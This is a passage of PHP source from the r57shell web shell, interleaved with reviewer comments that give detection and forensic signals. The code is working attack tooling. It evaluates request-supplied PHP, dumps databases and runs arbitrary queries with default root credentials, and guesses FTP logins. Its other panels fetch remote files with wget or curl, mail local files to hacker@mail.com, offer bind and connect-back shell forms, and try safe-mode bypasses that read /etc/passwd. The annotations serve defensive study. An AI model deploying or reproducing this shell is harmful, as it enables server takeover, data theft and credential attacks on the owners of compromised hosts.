1941 if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
1942 else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
1943 @ftp_close($connection);
1944 }
1945 echo "\r\n-------------------------------------\r\n";
// The reported attempt count is doubled with the reverse option, even for users where
// the first guess succeeded and the reversed one was never tried.
1946 $count = count($users);
1947 if(isset($_POST['reverse'])) { $count *= 2; }
1948 echo $lang[$language.'_text97'].$count."\r\n";
1949 echo $lang[$language.'_text98'].$suc."\r\n";
1950 }
// cmd=php_eval: executes request-supplied PHP source in this script's scope after
// stripping the open and close tags. eval is a language construct, so it cannot be
// switched off through disable_functions; the fix is removing the file.
// Detection: static scanners match eval() fed from $_POST; in traffic, POST bodies
// carrying cmd=php_eval together with a php_eval field.
1951if ($_POST['cmd']=="php_eval"){
1952 $eval = @str_replace("<?","",$_POST['php_eval']);
1953 $eval = @str_replace("?>","",$eval);
1954 @eval($eval);}
// cmd=mysql_dump: dumps a table with the my_sql helper class (defined outside this
// section) using connection details taken entirely from the request. The dump goes
// either into the output textarea or into a request-named file.
// Forensics: database logins from the web host with credentials the application does
// not normally use, and unexpected dump files in web-writable directories.
1955if ($_POST['cmd']=="mysql_dump")
1956 {
// Optional dump-to-file: opened for writing before the connection is attempted, so the
// target is created or truncated even if the dump fails. The handle is not closed here.
1957 if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
1958 $sql = new my_sql();
1959 $sql->db = $_POST['db'];
1960 $sql->host = $_POST['db_server'];
1961 $sql->port = $_POST['db_port'];
1962 $sql->user = $_POST['mysql_l'];
1963 $sql->pass = $_POST['mysql_p'];
1964 $sql->base = $_POST['mysql_db'];
1965 if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
1966 else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
1967 else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
1968 else {
// $sql->dump is read as a list of lines after the dump() call succeeded.
1969 if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
1970 else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
1971 else { echo "[-] ERROR! Can't write in dump file"; }
1972 }
1973 }
1974echo "</textarea></div>";
1975echo "</b>";
1976echo "</td></tr></table>";
1977echo "<table width=100% cellpadding=0 cellspacing=0>";
/**
 * Build the clickable caption of a collapsible panel.
 *
 * The link calls the page's change_divst() JavaScript function with the panel id.
 * Neither argument is escaped; the callers visible in this file pass literal ids
 * and strings from the language table.
 *
 * @param string $title caption text placed inside the link
 * @param string $id    id of the panel to toggle
 * @return string anchor markup
 */
function div_title($title, $id)
{
    $handler = 'change_divst(\'' . $id . '\');';
    $opening = '<a style="cursor: pointer;" onClick="' . $handler . '">';

    return $opening . $title . '</a>';
}
/**
 * Open the <div> of a collapsible panel.
 *
 * The panel starts hidden when a cookie named after the panel id exists and
 * compares loosely equal to 0. The id is written into the markup unescaped;
 * the callers visible in this file pass literal ids.
 *
 * @param string $id panel id, also used as the cookie name
 * @return string opening div tag
 */
function div($id)
{
    $collapsed = isset($_COOKIE[$id]) && $_COOKIE[$id] == 0;
    $style = $collapsed ? ' style="display: none;"' : '';

    return '<div id="' . $id . '"' . $style . '>';
}
1987if(!$safe_mode){
1988echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
1989echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
1990echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
1991echo $te.'</div>'.$table_end1.$fe;
1992}
1993else{
1994echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
1995echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
1996echo $te.'</div>'.$table_end1.$fe;
1997}
1998echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
1999echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
2000echo $te.'</div>'.$table_end1.$fe;
2001if($safe_mode){
2002echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
2003echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
2004echo $te.'</div>'.$table_end1.$fe;
2005}
2006if($safe_mode && $unix){
2007echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
2008echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2009echo $te.'</div>'.$table_end1.$fe;
2010}
2011if(!$safe_mode){
2012$aliases2 = '';
2013foreach ($aliases as $alias_name=>$alias_cmd)
2014 {
2015 $aliases2 .= "<option>$alias_name</option>";
2016 }
2017echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
2018echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2019echo $te.'</div>'.$table_end1.$fe;
2020}
2021echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
2022echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2023echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2024echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
2025echo $te.'</div>'.$table_end1.$fe;
2026if(!$safe_mode && $unix){
2027echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
2028echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2029echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2030echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
2031echo $te.'</div>'.$table_end1.$fe;
2032}
2033echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
2034echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
2035echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
2036echo "</textarea>";
2037echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
2038echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
2039echo "</div></div></font>";
2040echo $table_end1.$fe;
2041if($safe_mode&&$curl_on)
2042{
2043echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
2044echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2045echo $te.'</div>'.$table_end1.$fe;
2046}
2047if($safe_mode)
2048{
2049echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
2050echo "<table class=table1 width=100% align=center>";
2051echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2052echo $te.'</div>'.$table_end1.$fe;
2053}
2054if($safe_mode&&$mysql_on)
2055{
2056echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
2057echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
2058echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2059echo $te.'</div>'.$table_end1.$fe;
2060}
2061if($safe_mode&&$mssql_on)
2062{
2063echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
2064echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
2065echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2066echo $te.'</div>'.$table_end1.$fe;
2067}
2068if($safe_mode&&$unix&&function_exists('mb_send_mail')){
2069echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
2070echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2071echo $te.'</div>'.$table_end1.$fe;
2072}
2073if($safe_mode&&function_exists('imap_list')){
2074echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
2075echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2076echo $te.'</div>'.$table_end1.$fe;
2077}
2078if($safe_mode&&function_exists('imap_body')){
2079echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
2080echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2081echo $te.'</div>'.$table_end1.$fe;
2082}
2083if($safe_mode)
2084{
2085echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
2086echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
2087echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2088echo $te.'</div>'.$table_end1.$fe;
2089}
2090if(@ini_get('file_uploads')){
2091echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
2092echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
2093echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
2094echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2095echo $te.'</div>'.$table_end1.$fe;
2096}
2097if(!$safe_mode&&$unix){
2098echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
2099echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
2100echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2101echo $te.'</div>'.$table_end1.$fe;
2102}
2103echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
2104echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
2105$arh = $lang[$language.'_text92'];
2106if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
2107if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
2108if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
2109echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
2110echo $te.'</div>'.$table_end1.$fe;
// Panel id17: two side-by-side FTP forms, rendered only when ftp_connect() is
// available. Left column posts cmd=ftp_file_down, right column posts cmd=ftp_file_up;
// both carry ftp_server_port, ftp_login, ftp_password, ftp_file, loc_file, ftp_mode, dir.
// Each field is pre-filled from the previous POST when non-empty, otherwise from a
// hard-coded default (127.0.0.1:21, anonymous, billy@microsoft.com, /ftp-dir/file).
// The FTP transfer code itself is not in this part of the file.
// Detection / mitigation: cmd=ftp_file_down and cmd=ftp_file_up in POST bodies are
// request-level indicators. On the network side, FTP sessions initiated by the
// web-server account are the matching signal, and egress filtering of FTP from web
// hosts limits this panel. The panel is not rendered where the FTP functions are absent.
2111if(@function_exists("ftp_connect")){
2112echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2113echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
// NOTE(review): $_POST values are handed to in() as-is; whether in() HTML-escapes them
// is not visible here -- treat captured pages as potentially carrying reflected markup.
2114echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2115echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2116echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2117echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
2118echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2119echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2120echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
// Second column: same fields, but the hidden command is ftp_file_up.
2121echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2122echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
2123echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2124echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2125echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2126echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2127echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
2128echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2129echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
2130echo $te."</td>".$fe."</tr></div></table>";
2131}
// Panel id18: form posting cmd=ftp_brute with an ftp_server_port target, rendered
// only when $unix is set and ftp_connect() is available. The handler for ftp_brute
// is outside this part of the file; the name suggests FTP credential guessing --
// confirm against the handler before relying on that.
// Detection: cmd=ftp_brute in a POST body, and a GET of the script with the bare
// query string "users" (the link built from PHP_SELF below), are both log indicators.
2132if($unix && @function_exists("ftp_connect")){
2133echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
2134echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
// $_SERVER['PHP_SELF'] is written into the href without escaping on this line.
2135echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
// The name argument 'reverse id=reverse' carries an extra attribute; presumably in()
// emits the name unquoted so this also sets an id -- in() is defined elsewhere.
2136echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
2137echo $te.'</div>'.$table_end1.$fe;
2138}
// Panel id19: two mail forms, rendered only when mail() is available.
// Left column posts cmd=mail with to, from, subj, text; right column posts
// cmd=mail_file with to, from, subj, loc_file and the compress radio set ($arh,
// built earlier in the file). The sending code is outside this part of the file.
// Detection: the hard-coded defaults on this page (hacker@mail.com,
// billy@microsoft.com, "hello billy", "file from r57shell") are literal strings of
// this sample and are usable as content signatures in file scanning and in mail
// gateway rules; an operator can override them per request.
2139if(@function_exists("mail")){
2140echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2141echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
2142echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
2143echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2144echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
// $_POST['text'] is concatenated straight into the textarea body with no escaping.
2145echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
2146echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
// Second column: send a local file (loc_file, pre-filled with $dir) by mail.
2147echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2148echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
2149echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
2150echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2151echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
2152echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2153echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
2154echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2155echo $te."</td>".$fe."</tr></div></table>";
2156}
// Panel id20: database forms, rendered when at least one of $mysql_on, $mssql_on,
// $pg_on, $ora_on is set (these flags are assigned elsewhere in the file).
// Left column posts cmd=mysql_dump (db, db_server, db_port, mysql_l, mysql_p,
// mysql_db, mysql_tbl, dif, dif_name); right column posts cmd=db_query with a
// free-form db_query textarea. The field names mysql_l / mysql_p are used for
// every engine offered in the select. The code that connects and runs the
// statements is outside this part of the file.
// Detection / mitigation: cmd=mysql_dump and cmd=db_query in POST bodies are
// request-level indicators, and the default query text below is a literal content
// signature of this sample. On the database side, logins from the web host under
// accounts other than the application's own are the matching signal; least-privilege
// application accounts bound what these forms can reach.
2157if($mysql_on||$mssql_on||$pg_on||$ora_on)
2158{
// Engine selector: one option per engine flag that is set.
2159$select = '<select name=db>';
2160if($mysql_on) $select .= '<option>MySQL</option>';
2161if($mssql_on) $select .= '<option>MSSQL</option>';
2162if($pg_on) $select .= '<option>PostgreSQL</option>';
2163if($ora_on) $select .= '<option>Oracle</option>';
2164$select .= '</select>';
2165echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2166echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
2167echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
// Defaults when nothing was posted: localhost, 3306, root / password, mysql . user.
2168echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2169echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2170echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
// dif checkbox plus dif_name (default dump.sql): presumably "write the dump to this
// file" -- the handler is not visible here, confirm there.
2171echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
2172echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
// Second column: arbitrary query form (cmd=db_query).
2173echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2174echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
2175echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2176echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2177echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2178echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
2179echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
// $_POST['db_query'] is concatenated straight into the textarea body with no escaping.
2180echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
2181}
// Panel id21: three network forms in one row, rendered only when $safe_mode is off
// and $unix is set. Judging by the field names these are a port-bind form
// (port, bind_pass, use), a connect-back form (ip, port, use) and a port-forwarding
// form (local_port, remote_host, remote_port, use) -- the section titles come from
// the $lang table and the handlers are outside this part of the file, so confirm there.
// None of the three forms carries a hidden cmd field; how the handler tells them
// apart is not visible here.
// Detection / mitigation: the page-supplied defaults (TCP port 11457, password
// string r57, host irc.dalnet.ru, port 6667) are constants of this sample and serve
// as hunting values, though an operator can change them per request. Host-side, the
// matching signals are a web-server account opening a listening socket or an
// unexpected outbound connection; the Perl / C choices suggest a helper run through
// an interpreter or compiler -- presumably spawned by the web-server process, verify
// against the handler. Egress filtering on web hosts limits the second and third forms.
2182if(!$safe_mode&&$unix){
2183echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
2184echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
2185echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
2186echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
2187echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2188echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
// Second column. The ip field defaults to REMOTE_ADDR, i.e. the address of the client
// that requested this page as the server sees it, falling back to 127.0.0.1.
2189echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2190echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
2191echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
